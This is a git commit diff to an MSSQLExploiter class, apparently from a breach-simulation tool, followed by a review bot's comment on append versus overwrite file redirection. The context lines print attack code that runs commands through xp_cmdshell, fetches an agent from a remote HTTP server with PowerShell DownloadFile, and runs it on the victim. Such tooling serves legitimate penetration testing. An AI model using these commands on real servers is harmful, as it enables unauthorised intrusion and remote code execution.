Agent: Remove create_empty_payload_file() in MSSQLExploiter

Since the commands are no longer split up into 128-character chunks,
it's simpler to just overwrite an existing file using `>` than to create
an empty file and append to it.
Mike Salvatore 2022-06-14 12:13:45 -04:00
parent ea980c4594
commit 7846a6cac1
1 changed files with 2 additions and 15 deletions


@ -37,8 +37,7 @@ class MSSQLExploiter(HostExploiter):
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
XP_CMDSHELL_COMMAND_END = "'" XP_CMDSHELL_COMMAND_END = "'"
EXPLOIT_COMMAND_PREFIX = "<nul set /p=" EXPLOIT_COMMAND_PREFIX = "<nul set /p="
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}" EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = ( MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)." "powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@ -79,15 +78,11 @@ class MSSQLExploiter(HostExploiter):
try: try:
# Create dir for payload # Create dir for payload
self.create_temp_dir() self.create_temp_dir()
self.create_empty_payload_file()
http_thread = self.start_monkey_server(monkey_path_on_victim) http_thread = self.start_monkey_server(monkey_path_on_victim)
self.upload_monkey(monkey_path_on_victim) self.upload_monkey(monkey_path_on_victim)
MSSQLExploiter._stop_monkey_server(http_thread) MSSQLExploiter._stop_monkey_server(http_thread)
# Clear payload to pass in another command
self.create_empty_payload_file()
self.run_monkey(monkey_path_on_victim) self.run_monkey(monkey_path_on_victim)
self.remove_temp_dir() self.remove_temp_dir()
@ -116,14 +111,6 @@ class MSSQLExploiter(HostExploiter):
) )
self.run_mssql_command(dir_creation_command) self.run_mssql_command(dir_creation_command)
def create_empty_payload_file(self):
logger.debug(f"Creating an empty payload file: {self.payload_file_path}")
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
payload_file_path=self.payload_file_path
)
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
self.run_mssql_command(tmp_file_creation_command)
def run_mssql_command(self, mssql_command): def run_mssql_command(self, mssql_command):
array_of_commands = mssql_command.split_into_array_of_smaller_payloads() array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
if not array_of_commands: if not array_of_commands:
@ -182,7 +169,7 @@ class MSSQLExploiter(HostExploiter):
monkey_args = build_monkey_commandline( monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, monkey_path_on_victim
) )
suffix = ">>{}".format(self.payload_file_path) suffix = ">{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
return MSSQLLimitedSizePayload( return MSSQLLimitedSizePayload(
command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args), command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
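Review bot: The new `suffix = ">{}".format(self.payload_file_path)` in the last hunk hard-codes the same redirection that `EXPLOIT_COMMAND_SUFFIX` was just changed to in the first hunk, leaving two places that must agree on append-vs-overwrite semantics; consider `suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)` so a future change to the suffix cannot silently diverge. Switching from `>>` to `>` is only safe if every payload is written by a single command, yet the context line in `run_mssql_command` still calls `split_into_array_of_smaller_payloads()` — presumably it now yields one element, but if it ever returns several, each `>` write would truncate the previous piece, so a short comment or assertion there would document that assumption. The function containing the changed `suffix` line starts outside this hunk.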